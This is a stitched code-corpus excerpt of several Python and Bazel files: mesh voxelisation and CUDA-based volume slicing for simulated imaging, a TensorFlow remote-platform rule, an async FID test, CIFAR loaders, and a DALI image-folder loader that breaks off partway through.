outline = np.repeat(1 - mask[:, :, np.newaxis], 3, axis=2).\
astype(int)*210/255
outline = np.repeat(outline[:, :, :, np.newaxis],
image_num, axis=3)
visual_images = visual_images + outline
return points, simulation_images, visual_images
def show_plane(self,
image_array,
image_index,
point_array):
"""
Show intersection and plane geometry in 3D model
No suitable way of showing meshes, so this method
needs improvements
:param image_array: stack of images to show
:param image_index: stack index of image to be shown
:param point_array: point cloud with stack of plane points
"""
# Get number of points per plane
points_per_plane = int(point_array.shape[0]/image_array.shape[3])
# First, prepare figure
fig = plt.figure()
# Add 3D visualisation subplot
ax_3d = fig.add_subplot(121, projection='3d')
# Get the meshes to be plotted
for m_i in range(len(self.meshes.keys())):
# Add mesh to plot
if self.config["simulation"]["simulation_models"][m_i]:
model_name = self.config["models"]["files"][m_i]\
.replace(" ", "_")
model = self.meshes[model_name]
# Get color and opacity of models
model_color = np.array([self.config["simulation"]
["colors"][m_i]])/255
# model_opacity = np.array([self.config["simulation"]
# ["opacity"][model]])
ax_3d.scatter(model.vertices[0:-1:1, 0],
model.vertices[0:-1:1, 1],
model.vertices[0:-1:1, 2],
color=model_color,
alpha=0.5)
# Add plane point cloud
ax_3d.scatter(point_array[image_index*points_per_plane:
points_per_plane*(image_index + 1):10, 0],
point_array[image_index*points_per_plane:
points_per_plane*(image_index + 1):10, 1],
point_array[image_index*points_per_plane:
points_per_plane*(image_index + 1):10, 2],
color=[0, 0, 0])
# Add 2D visualisation subplot
ax_2d = fig.add_subplot(122)
ax_2d.imshow(image_array[:, :, :, image_index])
plt.show()
return 0
def voxelise_mesh(input_mesh,
voxel_size,
margin=None,
save_dir=None,
file_name=None):
"""
Method that generates binary volume from an input mesh
:param input_mesh: triangular mesh to be voxelised
:param voxel_size: 3D voxel size
:param margin: 3D vector with additional voxel margin
around the bounding box of the input mesh
:param save_dir: directory to save file
:param file_name: name of file to save
:return: 3D binary volume
"""
if margin is None:
margin = np.array([0, 0, 0])
bound_box = input_mesh.get_bounding_box()
# Add margins
bound_box[0, :] = bound_box[0, :] - margin
bound_box[1, :] = bound_box[1, :] + margin
# Define output size (x, y, z)
dimensions = (np.ceil(bound_box[1, :])
- np.floor(bound_box[0, :]))/voxel_size
# Round and convert to integer
bin_dimensions = np.ceil(dimensions).astype(int)
# Create empty volume
bin_volume = np.zeros(bin_dimensions, dtype=bool)
# Get point coordinates and faces
v_x = input_mesh.vertices[:, 0]
v_y = input_mesh.vertices[:, 1]
v_z = input_mesh.vertices[:, 2]
t_x = v_x[input_mesh.faces]
t_y = v_y[input_mesh.faces]
t_z = v_z[input_mesh.faces]
# Get face/triangles bounding box
tx_min = np.amin(t_x, axis=1)
ty_min = np.amin(t_y, axis=1)
tz_min = np.amin(t_z, axis=1)
tx_max = np.amax(t_x, axis=1)
ty_max = np.amax(t_y, axis=1)
tz_max = np.amax(t_z, axis=1)
# 1-Intersecting XY plane
xyplane_x = np.arange(np.floor(bound_box[0, 0]),
np.ceil(bound_box[1, 0]), voxel_size)
xyplane_y = np.arange(np.floor(bound_box[0, 1]),
np.ceil(bound_box[1, 1]), voxel_size)
# Loop through points with perpendicular ray and store them
inter_xy = np.empty((0, 3), dtype=float)
for x_ind in xyplane_x:
for y_ind in xyplane_y:
# Get intersectable triangles
inter_t = np.asarray(np.where((tx_min <= x_ind)
& (tx_max >= x_ind)
& (ty_min <= y_ind)
& (ty_max >= y_ind)))
# Test each of these triangles for intersection
for t_ind in inter_t[0, :]:
# Define the ray
origin = np.array([x_ind, y_ind, 0])
direction = np.array([0, 0, 1])
# Get triangle coordinates
triangle_xyz = input_mesh.vertices[input_mesh.faces[t_ind, :]]
# Test intersection
flag, dist = ray_triangle_intersection(origin,
direction,
triangle_xyz)
if flag:
intersection = origin + dist * direction
inter_xy = np.append(inter_xy, [intersection], axis=0)
print('Intersected XY plane')
# 2-Intersecting XZ plane
xzplane_x = np.arange(np.floor(bound_box[0, 0]),
np.ceil(bound_box[1, 0]), voxel_size)
xzplane_z = np.arange(np.floor(bound_box[0, 2]),
np.ceil(bound_box[1, 2]), voxel_size)
# Loop through points with perpendicular ray and store them
inter_xz = np.empty((0, 3), dtype=float)
for x_ind in xzplane_x:
for z_ind in xzplane_z:
# Get intersectable triangles
inter_t = np.asarray(np.where((tx_min <= x_ind)
& (tx_max >= x_ind)
& (tz_min <= z_ind)
& (tz_max >= z_ind)))
# Test each of these triangles for intersection
for t_ind in inter_t[0, :]:
# Define the ray
origin = np.array([x_ind, 0, z_ind])
direction = np.array([0, 1, 0])
# Get triangle coordinates
triangle_xyz = input_mesh.vertices[input_mesh.faces[t_ind, :]]
# Test intersection
flag, dist = ray_triangle_intersection(origin,
direction,
triangle_xyz)
if flag:
intersection = origin + dist * direction
inter_xz = np.append(inter_xz, [intersection], axis=0)
print('Intersected XZ plane')
# 3-Intersecting YZ plane
yzplane_y = np.arange(np.floor(bound_box[0, 1]),
np.ceil(bound_box[1, 1]), voxel_size)
yzplane_z = np.arange(np.floor(bound_box[0, 2]),
np.ceil(bound_box[1, 2]), voxel_size)
# Loop through points with perpendicular ray and store them
inter_yz = np.empty((0, 3), dtype=float)
for y_ind in yzplane_y:
for z_ind in yzplane_z:
# Get intersectable triangles
inter_t = np.asarray(np.where((ty_min <= y_ind)
& (ty_max >= y_ind)
& (tz_min <= z_ind)
& (tz_max >= z_ind)))
# Test each of these triangles for intersection
for t_ind in inter_t[0, :]:
# Define the ray
origin = np.array([0, y_ind, z_ind])
direction = np.array([1, 0, 0])
# Get triangle coordinates
triangle_xyz = input_mesh.vertices[input_mesh.faces[t_ind, :]]
# Test intersection
flag, dist = ray_triangle_intersection(origin,
direction,
triangle_xyz)
if flag:
intersection = origin + dist * direction
inter_yz = np.append(inter_yz, [intersection], axis=0)
print('Intersected YZ plane')
# Allocate indexes to binary image
final_intersections = np.vstack((inter_xy, inter_xz, inter_yz))
final_intersections = np.ceil((final_intersections -
np.floor(bound_box[0, :]))/voxel_size) - 1
# While there is no faster option
for plane in range(final_intersections.shape[0]):
x_ind = final_intersections[plane, 0].astype(int)
y_ind = final_intersections[plane, 1].astype(int)
z_ind = final_intersections[plane, 2].astype(int)
bin_volume[x_ind, y_ind, z_ind] = True
# Finally, go through z planes and fill vessels
for plane in range(bin_volume.shape[2]):
z_slice = bin_volume[:, :, plane].astype(int)
closed_z_slice = fill(z_slice)
bin_volume[:, :, plane] = closed_z_slice.astype(bool)
    if save_dir is not None and os.path.isdir(save_dir):
if file_name is None:
file_name = 'binary_map.npy'
np.save(save_dir + file_name, bin_volume)
return bin_volume
def ray_triangle_intersection(origin,
direction,
xyz):
"""
Checks if ray defined by origin o and
direction d intersects triangle with coordinates
3 x 3 in xyz
:param origin: origin of ray
:param direction: direction of ray
:param xyz: coordinates of triangle in 3 x 3 matrix
    :return: intersection flag and distance along the ray
"""
epsilon = 0.00001
p_0 = xyz[0, :]
p_1 = xyz[1, :]
p_2 = xyz[2, :]
e_1 = p_1 - p_0
e_2 = p_2 - p_0
q_value = np.cross(direction, e_2)
a_value = np.dot(e_1, q_value)
# Check if ray is parallel to face
if np.abs(a_value) < epsilon:
return 0, 0
f_value = 1 / a_value
s_value = origin - p_0
u_value = f_value * np.dot(s_value, q_value)
# Check if intersection is not within face
if u_value < 0:
return 0, 0
r_value = np.cross(s_value, e_1)
v_value = f_value * np.dot(direction, r_value)
# Check again
if (v_value < 0) | (v_value + u_value > 1):
return 0, 0
dist = f_value * np.dot(e_2, r_value)
flag = 1
return flag, dist
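# Added for illustration (not part of the original module): a quick standalone
# check of ray_triangle_intersection. A ray from (0.2, 0.2, 0) along +z against
# the unit right triangle lying in the plane z = 1 should intersect it at
# distance 1:
#
#   _origin = np.array([0.2, 0.2, 0.0])
#   _direction = np.array([0.0, 0.0, 1.0])
#   _triangle = np.array([[0.0, 0.0, 1.0],
#                         [1.0, 0.0, 1.0],
#                         [0.0, 1.0, 1.0]])
#   ray_triangle_intersection(_origin, _direction, _triangle)  # -> (1, 1.0)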
def slice_volume(kernel_code,
image_variables,
g_variables,
blockdim,
model_index,
voxel_size,
poses,
out_points=False):
"""
Function that slices a binary volume with fan shaped sections
section defined by poses of a curvilinear array
:param kernel_code: CUDA C++ kernel code to compile
:param image_variables: image dimensioning variable list
:param g_variables: All preallocated GPU variables
as described in the preallocation function. A list with
the following indexes:
0 - fan positions in 2D
1 - fan positions in 3D
    2 - binary intersections mapped in fan positions
    3 - the output images in image space
    4 - the 2D fan mask outline
    5 onwards - the binary volumes to slice, one per model
:param blockdim: block dimensions for CUDA kernels
:param model_index: index of model in g_variables to be sliced
:param voxel_size: voxel_size of the volume
:param poses: input set of poses
:param out_points: bool to get fan positions or not
:return: positions in 3D, stack of resulting images, image
with fan shape outline
"""
# First, compile kernel code with SourceModule
cuda_modules = SourceModule(kernel_code)
# Get image variables from input
fan_parameters = image_variables[0]
slice_dim = image_variables[1]
image_dim = image_variables[2]
pixel_size = image_variables[3]
# Define voxel size for intersection of binary volume
voxel_size = voxel_size.astype(np.float32)
# Get size of one image, useful to get array of images
im_size = image_dim[0] * image_dim[1]
# Get block and grid dimensions as int
blockdim_x = int(blockdim[0])
blockdim_y = int(blockdim[1])
griddim_x = int(slice_dim[0] / blockdim_x)
griddim_y = int(slice_dim[1] / blockdim_y)
image_num = int(slice_dim[2])
# Convert poses to 1D array to be input in a kernel
pose_array = np.zeros((1, 9 * image_num)).astype(np.float32)
# And an array to offset fan position per image plane
offset_array = np.zeros((1, 3 * image_num)).astype(np.float32)
for p_ind in range(image_num):
pose = poses[:, 4*p_ind:4*(p_ind+1)]
# Allocate the pose
pose_array[0, 9*p_ind:9*(p_ind+1)] = \
np.hstack((pose[0, 0:2], pose[0, 3],
pose[1, 0:2], pose[1, 3],
pose[2, 0:2], pose[2, 3]))
# Allocate the offset
offset_array[0, 3*p_ind:3*(p_ind+1)] = pose[0:3, 1]
# 1-Run position computation kernel, acts on index 0 and 1 of
# the gpu variables, get kernel
transform_kernel = cuda_modules.get_function("transform")
# Then run it
transform_kernel(g_variables[1],
g_variables[0],
drv.In(pose_array),
drv.In(offset_array),
drv.In(fan_parameters),
np.int32(image_num),
block=(blockdim_x, blockdim_y, 3),
grid=(griddim_x, griddim_y, image_num))
# Collect the output to a CPU array
positions_3d = np.empty((1, np.prod(slice_dim) * 3), dtype=np.float32)
# In case points are to be used or visualised (with out_points as True)
if out_points is True:
g_variables[1].get(positions_3d)
positions_3d = positions_3d.reshape([3, np.prod(slice_dim)]).T
# 2-Next step, run slicing kernel, where intensity values are
# placed in the positions. Define volume dimensions
bound_box = image_variables[4 + model_index][0]
vol_dim = image_variables[4 + model_index][1]
binary_volume_dims = np.hstack((bound_box[0, :],
vol_dim[0],
vol_dim[1],
vol_dim[2])).astype(np.float32)
# Call kernel from file
slice_kernel = cuda_modules.get_function('slice')
# Then run it, using the preallocated g_variable model
slice_kernel(g_variables[2],
g_variables[1],
g_variables[5 + model_index],
drv.In(binary_volume_dims),
drv.In(voxel_size),
drv.In(slice_dim),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# 3-Map pixels to fan like image
# Define bounds of image output in 2d coordinates as float
image_bounding_box = np.array([-image_dim[0] * pixel_size[0]/2 * 1000,
0, image_dim[0],
image_dim[1]]).astype(np.float32)
# Allocate output images, the binary image as an int, and the
    # fan mask as a boolean; these must live in CPU memory
binary_images = np.empty((1, np.prod(image_dim)), dtype=np.int32)
mask = np.empty((1, np.prod(image_dim)), dtype=bool)
# Call kernel from file
map_kernel = cuda_modules.get_function('map_back')
    # Then run it, multiplying coordinate values by 1000 in order
# to avoid sampling errors
map_kernel(g_variables[3],
g_variables[4],
g_variables[2],
g_variables[0]*1000,
drv.In(slice_dim),
drv.In(image_bounding_box),
drv.In(pixel_size*1000),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# Create a volume with generated images
binary_image_array = np.zeros((image_dim[1],
image_dim[0],
image_dim[2])).astype(bool)
    # Gather the results
g_variables[3].get(binary_images)
g_variables[4].get(mask)
# Flush the vector
g_variables[3].fill(0)
for plane in range(image_num):
# Get image and reshape it
current_image = binary_images[0, im_size*plane:
im_size*(plane+1)]
current_image = current_image.reshape(image_dim[0], image_dim[1]).T
# Morphological operations to clean image
current_image = erode(current_image, iterations=2)
current_image = dilate(current_image, iterations=2)
# Allocate to output
binary_image_array[:, :, plane] = current_image
# Get the fan mask, mostly used for visualisation
mask = mask[0, 0:im_size]
mask = mask.reshape(image_dim[0], image_dim[1]).T
# Output a stack of images, where each z-slice has a plane,
# and the corresponding 3D positions, plus an outline of the fan
return positions_3d, binary_image_array, mask
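# A minimal usage sketch for the slicing routine above. The kernel source,
# preallocated GPU variables and pose stack are assumed to come from elsewhere
# in this module; all names below are placeholders, not the actual API:
#
#   positions, images, fan_mask = slice_volume(kernel_code=kernel_source,
#                                              image_variables=image_vars,
#                                              g_variables=gpu_vars,
#                                              blockdim=(32, 32),
#                                              model_index=0,
#                                              voxel_size=np.array([0.5, 0.5, 0.5]),
#                                              poses=pose_stack,
#                                              out_points=True)
#   # images is a boolean stack with one fan-shaped slice per pose.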
def linear_slice_volume(kernel_code,
image_variables,
g_variables,
blockdim,
model_index,
voxel_size,
poses,
out_points=False):
"""
Function that slices a binary volume with rectangular sections
defined by poses of a linear array
:param kernel_code: CUDA C++ kernel code to compile
:param image_variables: image dimensioning variable list
:param g_variables: All preallocated GPU variables
as described in the preallocation function. A list with
the following indexes:
0 - rectangle positions in 3D
1 - rectangular intensity images
2 - the target intensity volume
:param blockdim: block dimensions for CUDA kernels
:param model_index: index of model in g_variables to be sliced
:param voxel_size: voxel_size of the volume
:param poses: input set of poses
:param out_points: bool to get rectangular positions or not
:return: positions in 3D, stack of resulting images
"""
# First, compile kernel code with SourceModule
cuda_modules = SourceModule(kernel_code)
# Get image variables from input
image_dim = image_variables[0]
pixel_size = image_variables[1]
# Define voxel size for intersection of binary volume
voxel_size = voxel_size.astype(np.float32)
# Get size of one image, useful to get array of images
im_size = image_dim[0] * image_dim[1]
# Get block and grid dimensions as int
blockdim_x = int(blockdim[0])
blockdim_y = int(blockdim[1])
griddim_x = int(image_dim[0] / blockdim_x)
griddim_y = int(image_dim[1] / blockdim_y)
image_num = int(image_dim[2])
# Convert poses to 1D array to be input in a kernel
pose_array = np.zeros((1, 9 * image_num)).astype(np.float32)
for p_ind in range(image_num):
pose = poses[:, 4*p_ind:4*(p_ind+1)]
# Allocate the pose
pose_array[0, 9*p_ind:9*(p_ind+1)] = \
np.hstack((pose[0, 0:2], pose[0, 3],
pose[1, 0:2], pose[1, 3],
pose[2, 0:2], pose[2, 3]))
# 1-Run position computation kernel, acts on index 0
# the gpu variables, get kernel
transform_kernel = cuda_modules.get_function("linear_transform")
# Then run it
transform_kernel(g_variables[0],
drv.In(pose_array),
drv.In(pixel_size),
drv.In(image_dim),
block=(blockdim_x, blockdim_y, 3),
grid=(griddim_x, griddim_y, image_num))
# Collect the output to a CPU array
positions_3d = np.empty((1, np.prod(image_dim) * 3), dtype=np.float32)
# In case points are to be used or visualised (with out_points as True)
if out_points is True:
g_variables[0].get(positions_3d)
positions_3d = positions_3d.reshape([3, np.prod(image_dim)]).T
# 2-Next step, run slicing kernel, where intensity values are
# placed in the positions. Define volume dimensions
bound_box = image_variables[2 + model_index][0]
vol_dim = image_variables[2 + model_index][1]
binary_volume_dims = np.hstack((bound_box[0, :],
vol_dim[0],
vol_dim[1],
vol_dim[2])).astype(np.float32)
# Allocate space for output images, in CPU
binary_images = np.empty((1, np.prod(image_dim)), dtype=np.int32)
# Call kernel from file
slice_kernel = cuda_modules.get_function('slice')
# Then run it
slice_kernel(g_variables[1],
g_variables[0],
g_variables[2 + model_index],
drv.In(binary_volume_dims),
drv.In(voxel_size),
drv.In(image_dim),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# Create a volume with generated images
binary_image_array = np.zeros((image_dim[1],
image_dim[0],
image_dim[2])).astype(bool)
# Gather the results
g_variables[1].get(binary_images)
for plane in range(image_num):
# Get each image and reshape it
current_image = binary_images[0, im_size*plane:
im_size*(plane+1)]
current_image = current_image.reshape(image_dim[1], image_dim[0])
# Morphological operations to clean image
current_image = erode(current_image, iterations=2)
current_image = dilate(current_image, iterations=2)
# Allocate to output
binary_image_array[:, :, plane] = current_image
# Output a stack of images, where each z-slice has a plane,
# and the corresponding 3D positions
return positions_3d, binary_image_array
def show_volume(bin_volume):
"""
Function that scrolls through volume in Z direction
:param bin_volume: binary volume to show
"""
if len(bin_volume.shape) != 3:
raise ValueError("Not a valid volume")
# Display z slices of volume
for z_ind in range(bin_volume.shape[2]):
plt.cla()
z_slice = bin_volume[:, :, z_ind].astype(int)
plt.title('Slice number ' + str(z_ind))
plt.imshow(z_slice, cmap='gray')
plt.pause(.001)
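# Illustrative usage (hypothetical volume): scroll through a random boolean volume.
#   show_volume(np.random.rand(64, 64, 32) > 0.5)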
``` |
{
"source": "jraman/tensorflow",
"score": 2
} |
#### File: third_party/remote_config/remote_platform_configure.bzl
```python
def _remote_platform_configure_impl(repository_ctx):
repository_ctx.template(
"BUILD",
Label("@org_tensorflow//third_party/remote_config:BUILD.tpl"),
{
"%{container_image}": repository_ctx.attr.container_image,
},
)
remote_platform_configure = repository_rule(
implementation = _remote_platform_configure_impl,
attrs = {
"container_image": attr.string(mandatory = True),
},
)
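# A minimal usage sketch (assumed, not part of the original file): load the rule
# in a WORKSPACE and point it at a container image. The target name and image
# below are placeholders.
#
#   load("//third_party/remote_config:remote_platform_configure.bzl", "remote_platform_configure")
#   remote_platform_configure(
#       name = "remote_execution_platform",
#       container_image = "docker://gcr.io/my-project/my-build-image:latest",
#   )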
``` |
{
"source": "jramapuram/async_fid",
"score": 3
} |
#### File: jramapuram/async_fid/test_async.py
```python
import os
import time
import numpy as np
# create some random data to post to both the calls
rv = np.random.rand(10000, 28, 28, 1)
def async_test(f, task='mnist'):
"""Creates a sync-fid object and tests random data and the test set.
:param task: string value for task
:param data_dir: the directory to store the data
:returns: nothing
:rtype: None
"""
f.post(fake_images=rv,
lbda=lambda s: print("\n[{}]\tFID for random data vs. test-set : {}.".format(task, s)),
dataset_str=task
)
print('posted async item!')
# post your own data as well directly, FID internally auto-rescales to 255
f.post_with_images(fake_images=f.test_dict[task],
real_images=f.test_dict[task],
lbda=lambda s: print("\n[{}]\tFID for test-set vs. test-set : {}\n".format(task, s)))
print('posted async item!')
from fid.fid import AsyncFID as FID
f = FID(normalize=True, force_cpu=False)
f.add_dataset(dataset_str='mnist', root_folder='./mnist')
# Note that the async FID returns here instantly instead of blocking
async_test(f, task='mnist')
# we need to introduce a sleep here to see this message after TensorFlow's verbose startup logging
time.sleep(10)
f.terminate() # kills the inner process **AFTER** finishing the queue of tasks
print("\nasync tests spawned, waiting for spawned process to terminate...")
# join blocks the current thread until f terminates.
f.join()
``` |
{
"source": "jramapuram/datasets",
"score": 3
} |
#### File: jramapuram/datasets/cifar.py
```python
import functools
from torchvision import datasets
from .abstract_dataset import AbstractLoader
class CIFAR10Loader(AbstractLoader):
"""Simple CIFAR10 loader, there is no validation set."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
cuda=True, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(datasets.CIFAR10, root=path, train=True, download=True)
test_generator = functools.partial(datasets.CIFAR10, root=path, train=False, download=True)
super(CIFAR10Loader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
self.output_size = 10 # fixed
self.loss_type = 'ce' # fixed
# grab a test sample to get the size
test_img, _ = self.train_loader.__iter__().__next__()
self.input_shape = list(test_img.size()[1:])
print("derived image shape = ", self.input_shape)
class CIFAR100Loader(AbstractLoader):
"""Simple CIFAR100 loader, there is no validation set."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
cuda=True, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(datasets.CIFAR100, root=path, train=True, download=True)
test_generator = functools.partial(datasets.CIFAR100, root=path, train=False, download=True)
super(CIFAR100Loader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
self.output_size = 100 # fixed
self.loss_type = 'ce' # fixed
# grab a test sample to get the size
test_img, _ = self.train_loader.__iter__().__next__()
self.input_shape = list(test_img.size()[1:])
print("derived image shape = ", self.input_shape)
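# A minimal usage sketch (path, batch size and transforms are placeholders; the
# abstract loader is assumed to handle tensor conversion and batching):
#   loader = CIFAR10Loader(path='./data/cifar10', batch_size=128)
#   images, labels = next(iter(loader.train_loader))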
```
#### File: jramapuram/datasets/dali_imagefolder.py
```python
import os
import torch.distributed as dist
import nvidia.dali.ops as ops
import nvidia.dali.types as types
from copy import deepcopy
from typing import Optional
from nvidia.dali.pipeline import Pipeline
from nvidia.dali.plugin.pytorch import DALIClassificationIterator, DALIGenericIterator
from .abstract_dataset import AbstractLoader
# For reference
IMAGENET_MEAN = [0.485 * 255, 0.456 * 255, 0.406 * 255]
IMAGENET_STD = [0.229 * 255, 0.224 * 255, 0.225 * 255]
class Mux(object):
"""DALI doesn't support probabilistic augmentations, so use muxing."""
def __init__(self, prob=0.5):
self.to_bool = ops.Cast(dtype=types.DALIDataType.BOOL)
self.rng = ops.CoinFlip(probability=prob)
def __call__(self, true_case, false_case):
"""Use masking to mux."""
condition = self.to_bool(self.rng())
neg_condition = condition ^ True
return condition * true_case + neg_condition * false_case
class RandomGrayScale(object):
"""Parallels RandomGrayscale from torchvision. Written by @klecki"""
def __init__(self, prob=0.5, cuda=True):
self.coin = ops.CoinFlip(probability=prob)
self.cast_fp32 = ops.Cast(dtype=types.FLOAT)
self.hsv = ops.Hsv(device="gpu" if cuda else "cpu", dtype=types.UINT8)
def __call__(self, images):
saturate = self.coin()
saturate_fp32 = self.cast_fp32(saturate)
converted = self.hsv(images, saturation=saturate_fp32)
return converted
class RandomHorizontalFlip(object):
"""Parallels RandomHorizontalFlip from torchvision."""
def __init__(self, prob=0.5, cuda=True):
self.mux = Mux(prob=prob)
self.op = ops.Flip(device="gpu" if cuda else "cpu",
horizontal=1,
depthwise=0,
vertical=0)
def __call__(self, images):
return self.mux(true_case=self.op(images), false_case=images)
class ColorJitter(object):
"""Parallels torchvision ColorJitter."""
def __init__(self, brightness=0.8, contrast=0.8, saturation=0.2, hue=0, prob=0.8, cuda=True):
"""Parallels the torchvision color-jitter transform.
Args:
brightness (float or tuple of float (min, max)): How much to jitter brightness.
brightness_factor is chosen uniformly from [max(0, 1 - brightness), 1 + brightness]
or the given [min, max]. Should be non negative numbers.
contrast (float or tuple of float (min, max)): How much to jitter contrast.
contrast_factor is chosen uniformly from [max(0, 1 - contrast), 1 + contrast]
or the given [min, max]. Should be non negative numbers.
saturation (float or tuple of float (min, max)): How much to jitter saturation.
saturation_factor is chosen uniformly from [max(0, 1 - saturation), 1 + saturation]
or the given [min, max]. Should be non negative numbers.
hue (float or tuple of float (min, max)): How much to jitter hue.
hue_factor is chosen uniformly from [-hue, hue] or the given [min, max].
Should have 0<= hue <= 0.5 or -0.5 <= min <= max <= 0.5.
prob (float): probability of applying the ColorJitter transform at all.
cuda (bool): if true uses the GPU
"""
# This RNG doesn't actually work dynamically
self.mux = Mux(prob=prob)
# Generates uniform values within appropriate ranges
self.brightness = ops.Uniform(range=(max(0, 1.0 - brightness), 1.0 + brightness))
self.contrast = ops.Uniform(range=(max(0, 1.0 - contrast), 1.0 + contrast))
self.saturation = ops.Uniform(range=(max(0, 1.0 - saturation), 1.0 + saturation))
self.hue = ops.Uniform(range=(-hue, hue))
# The actual transform
self.op = ops.ColorTwist(device="gpu" if cuda else "cpu",
image_type=types.RGB)
def __call__(self, images):
true_case = self.op(images,
brightness=self.brightness(),
saturation=self.saturation(),
contrast=self.contrast(),
hue=self.hue())
return self.mux(true_case=true_case, false_case=images)
class CropMirrorNormalize(object):
"""A cleaner version of crop-mirror-normalize."""
def __init__(self, crop=None,
cuda=True,
mean=[0.0, 0.0, 0.0],
std=[1.0, 1.0, 1.0],
flip_prob=0.5):
"""Crops, mirrors horizontally (with prob flip_prob) and normalizes with (x-mean)/std.
:param crop: tuple for cropping or None for not Cropping
:param cuda: are we using cuda?
:param mean: mean to subtract
:param std: std-dev to divide by
        :param flip_prob: probability of a horizontal flip
:returns: operator
:rtype: object
"""
if crop is not None:
assert isinstance(crop, (tuple, list)), "crop needs to be a tuple/list: (h, w)."
self.cmnp = ops.CropMirrorNormalize(device="gpu" if cuda else "cpu",
crop=crop,
# output_dtype=types.UINT8, #FLOAT,
output_layout=types.NHWC,
image_type=types.RGB,
mean=mean, std=std)
self.coin = ops.CoinFlip(probability=flip_prob)
def __call__(self, images):
rng = self.coin()
return self.cmnp(images, mirror=rng)
class HybridPipeline(Pipeline):
"""A simple DALI image pipeline."""
def __init__(self, data_dir: str, batch_size: int, shuffle: bool = False, device: str = "gpu",
transforms=None, target_transform=None, workers_per_replica: int = 2,
rank: int = 0, num_replicas: int = 1, num_augments: int = 1,
seed: Optional[int] = None, **kwargs):
"""Hybrid NVIDIA-DALI pipeline.
:param data_dir: directory where images are stored.
:param batch_size: batch size
:param shuffle: shuffle dataset?
:param device: cpu or gpu
:param transforms: a list of nvidia dali ops.
:param target_transform: same as pytorch target_transform
:param workers_per_replica: local dataloader threads to use
:param rank: global rank in a DDP setting (or 0 for local)
:param num_replicas: total replicas in the pool
:param num_augments: used if you want multiple augmentations of the image
:param seed: optional seed for dataloader
:returns: Dali pipeline
:rtype: nvidia.dali.pipeline.Pipeline
"""
super(HybridPipeline, self).__init__(batch_size=batch_size,
num_threads=workers_per_replica,
device_id=0, # Always 0 because set via CUDA_VISIBLE_DEVICES
seed=seed if seed is not None else -1)
self.num_augments = num_augments
transform_list = []
if transforms is not None:
assert isinstance(transforms, (tuple, list)), "transforms need to be a list/tuple or None."
transform_list.extend(transforms)
# Convert to CHW for pytorch
transform_list.append(ops.Transpose(device=device, perm=(2, 0, 1)))
self.transforms = transform_list
self.target_transform = target_transform
# The base file reader
self.file_reader = ops.FileReader(file_root=data_dir,
shard_id=rank,
num_shards=num_replicas,
random_shuffle=shuffle)
# The nv-decoder and magic numbers from: https://bit.ly/3cSi359
        # Stated there that these sizes are required for full-sized ImageNet images.
device = "mixed" if device == "gpu" else device
device_memory_padding = 211025920 if device == 'mixed' else 0 # magic numbers
host_memory_padding = 140544512 if device == 'mixed' else 0 # magic numbers
self.decode = ops.ImageDecoder(device=device,
device_memory_padding=device_memory_padding,
host_memory_padding=host_memory_padding,
output_type=types.RGB)
# Set the output_size based on the number of folders in the directory
self.output_size = sum([1 for d in os.listdir(data_dir)
if os.path.isdir(os.path.join(data_dir, d))])
def define_graph(self):
# First just read the image path and labels and then decode them.
images, labels = self.file_reader(name="Reader")
images = self.decode(images)
# Now apply the transforms
if self.transforms:
augmented = []
for _ in range(self.num_augments): # Apply it multiple times if requested
augmented_i = images
for transform in self.transforms:
augmented_i = transform(augmented_i)
augmented.append(augmented_i)
else:
augmented = [images]
# transform the labels if applicable
if self.target_transform:
labels = self.target_transform(labels)
return (*augmented, labels)
def get_local_rank(num_replicas):
"""Helper to return the current distributed rank."""
rank = 0
if num_replicas > 1:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
rank = dist.get_rank()
return rank
class DALIClassificationIteratorLikePytorch(DALIClassificationIterator):
def __next__(self):
"""Override this to return things like pytorch."""
sample = super(DALIClassificationIteratorLikePytorch, self).__next__()
if sample is not None and len(sample) > 0:
if isinstance(sample[0], dict):
images = sample[0]["data"]
labels = sample[0]["label"]
else:
images, labels = sample
return images.float() / 255, labels.squeeze().long()
class DALIImageFolderLoader(AbstractLoader):
"""Simple DALI image-folder loader, but doesn't follow normal AbstractLoader."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None, valid_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
valid_transform=None, valid_target_transform=None,
cuda=True, num_augments=1, **kwargs):
rank = get_local_rank(num_replicas)
# Build the train dataset and loader
train_kwargs = deepcopy(kwargs)
train_kwargs['seed'] = train_kwargs.get('seed', 1234 + rank) or 1234 + rank # different RNG per replica
train_dataset = HybridPipeline(data_dir=os.path.join(path, 'train'),
batch_size=batch_size,
shuffle=True,
device="gpu" if cuda else "cpu",
transforms=train_transform,
target_transform=train_target_transform,
rank=rank, num_replicas=num_replicas,
num_augments=num_augments, **train_kwargs)
train_dataset.build()
self.train_loader = MultiAugmentDALIClassificationIterator(
train_dataset, size=train_dataset.epoch_size("Reader") // num_replicas,
fill_last_batch=True,
last_batch_padded=True,
auto_reset=True,
num_augments=num_augments
)
# Build the test dataset and loader
val_test_kwargs = deepcopy(kwargs)
val_test_kwargs['seed'] = 1234 + rank # Fixed shuffle for each replica
test_dataset = HybridPipeline(data_dir=os.path.join(path, 'test'),
batch_size=batch_size,
shuffle=False,
device="gpu" if cuda else "cpu",
transforms=test_transform,
target_transform=test_target_transform,
rank=0, num_replicas=1, # Use FULL test set on each replica
num_augments=num_augments, **val_test_kwargs)
test_dataset.build()
